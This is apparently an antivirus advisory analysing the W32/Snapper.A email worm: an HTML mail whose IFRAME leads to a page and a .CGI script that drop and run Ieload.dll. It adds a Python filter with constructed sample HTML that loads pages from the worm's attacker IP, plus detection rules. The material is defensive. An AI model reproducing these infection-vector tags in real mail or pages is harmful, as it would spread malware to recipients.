W32/Snapper.A
Analysis
Specifics
This threat was short-lived, since one of its main components is no longer accessible. The threat is composed of four parts:
HTML email message - spawned by the virus component (Ieload.dll)
HTML web page - accessed when the link in the email is followed
CGI script - accessed by the HTML web page
DLL component - the virus itself; initiates email messages to other contacts
Without the .CGI script component, this threat does not function.
HTML Email Vector
This threat is introduced to a system via an email message sent from an infected client. The email contains a hyperlink to a web address hosting HTML code; that code in turn accesses a .CGI script, which creates a local file named Ieload.dll from encoded data embedded within the script.
The email may arrive in this format -
Subject: Re:
Body:
(none)
The body of the email contains HTML code with an IFRAME reference to the HTML file "banner.htm" at a specific IP address.
CGI File Creation
When the email is opened, it accesses a web address and the file "banner.htm". On Internet Explorer 5.0 or 5.5 this HTML file uses an OBJECT data tag to access the .CGI script; if the browser version is 6.0, the HTML code instead uses an IFRAME to access the .CGI script. The .CGI script contains an embedded .DLL file, which is decoded into the Windows folder as "Ieload.dll" with a file size of 8,704 bytes. The .CGI script then activates the .DLL file using the Windows application RUNDLL32.
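The email vector and the "banner.htm" landing page described above both rely on HTML that pulls content from a raw IP address through IFRAME and OBJECT tags. The following is an added example, not code from the original advisory or from Fortinet, showing how a mail or web gateway filter could flag such references. The sample email body and landing page are constructed for the example; the URL paths "/banner.htm" and "/cgi-bin/PLACEHOLDER.cgi" are assumptions (the advisory names only the file "banner.htm" and a .CGI script), while the IP address 198.170.245.129 is the indicator the advisory itself lists.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Indicators taken from the advisory: the IFRAME points to banner.htm at this host.
KNOWN_BAD_HOST = "198.170.245.129"
KNOWN_BAD_FILE = "banner.htm"

# Constructed sample of an email body shaped like the one described.
# The path "/banner.htm" is an assumption; the advisory gives only the file name.
SAMPLE_EMAIL_BODY = (
    "<html><body>"
    '<iframe src="http://198.170.245.129/banner.htm" width="0" height="0"></iframe>'
    "</body></html>"
)

# Constructed sample of a landing page like "banner.htm": an OBJECT data tag (IE 5.x)
# and an IFRAME (IE 6.0) that both load a .CGI script. The script name is a placeholder.
SAMPLE_BANNER_PAGE = (
    "<html><body>"
    '<object data="http://198.170.245.129/cgi-bin/PLACEHOLDER.cgi" type="text/html"></object>'
    '<iframe src="http://198.170.245.129/cgi-bin/PLACEHOLDER.cgi"></iframe>'
    "</body></html>"
)

IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


class RemoteRefParser(HTMLParser):
    """Collects the remote references made by IFRAME src and OBJECT data attributes."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "iframe" and attrs.get("src"):
            self.refs.append(("iframe", attrs["src"]))
        elif tag == "object" and attrs.get("data"):
            self.refs.append(("object", attrs["data"]))


def classify_ref(kind, url):
    """Return the list of reasons a reference is suspicious (empty if none)."""
    reasons = []
    parsed = urlparse(url)
    host = parsed.hostname or ""
    path = parsed.path.lower()
    if host == KNOWN_BAD_HOST:
        reasons.append("known indicator host")
    elif IPV4_RE.match(host):
        # Legitimate mail rarely embeds frames that point at a bare IP address.
        reasons.append("raw IP address host")
    if path.endswith("/" + KNOWN_BAD_FILE):
        reasons.append("references banner.htm")
    if path.endswith(".cgi"):
        reasons.append(f"{kind} loads a .cgi script")
    return reasons


def scan_html(html):
    """Return (kind, url, reasons) for every IFRAME/OBJECT reference worth flagging."""
    parser = RemoteRefParser()
    parser.feed(html)
    findings = []
    for kind, url in parser.refs:
        reasons = classify_ref(kind, url)
        if reasons:
            findings.append((kind, url, reasons))
    return findings


if __name__ == "__main__":
    for label, sample in (("email body", SAMPLE_EMAIL_BODY), ("landing page", SAMPLE_BANNER_PAGE)):
        for kind, url, reasons in scan_html(sample):
            print(f"{label}: <{kind}> {url} -> {', '.join(reasons)}")
```

The parser deliberately looks only at IFRAME and OBJECT, the two tags the advisory names; a production filter would treat any frame or object whose host is a bare IP address as a policy violation regardless of the specific indicator.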
DLL Email Creation
When the binary "Ieload.dll" is activated using RUNDLL32, the code accesses the Windows Address Book (WAB) and attempts to generate an email for each contact listed. The email is created in this format -
Subject: Re:
Body:
(none)
The body of the email contains HTML code with an IFRAME reference to the HTML file "banner.htm" at a specific IP address.
Recommended Action
- Check the main screen of your FortiGate unit's web interface to ensure that the latest AV/NIDS database has been downloaded and installed on your system; if required, enable the "Allow Push Update" option.
- Using the FortiGate manager, block internal-to-external access to the IP address 198.170.245.129.